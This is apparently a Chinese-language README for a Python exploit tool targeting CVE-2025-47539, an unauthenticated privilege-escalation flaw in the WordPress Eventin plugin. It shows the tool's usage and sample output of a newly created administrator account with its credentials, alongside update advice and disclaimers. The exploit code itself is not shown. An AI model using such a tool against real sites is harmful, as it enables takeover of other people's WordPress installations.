WordPress 的 Event Manager, Events Calendar, Tickets, Registrations – Eventin 插件因 import_items() 函数缺少授权检查,存在 未认证权限提升 漏洞。
<= 4.0.26CVE-2025-475399.8(严重)2025 年 5 月 7 日2025 年 5 月 15 日未认证攻击者可向 REST API 构造恶意请求,在无需用户交互的情况下创建具有 administrator 权限的新用户。
本 Python 脚本是 CVE-2025-47539 的独立利用工具。
它将:
⚠️ 本脚本仅用于教育目的和专业安全评估。
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
超过 10,000+ 个 WordPress 站点被确认易受此漏洞影响。
所有使用 Eventin ≤ 4.0.26 的站点管理员应 立即更新 至 4.0.28 或更高版本。
本工具 仅用于教育和授权渗透测试。
创建者 不对因使用本脚本造成的任何滥用或损害负责。
作者: Nxploited ( Khaled_Alenazi )
📧 联系邮箱: [email protected]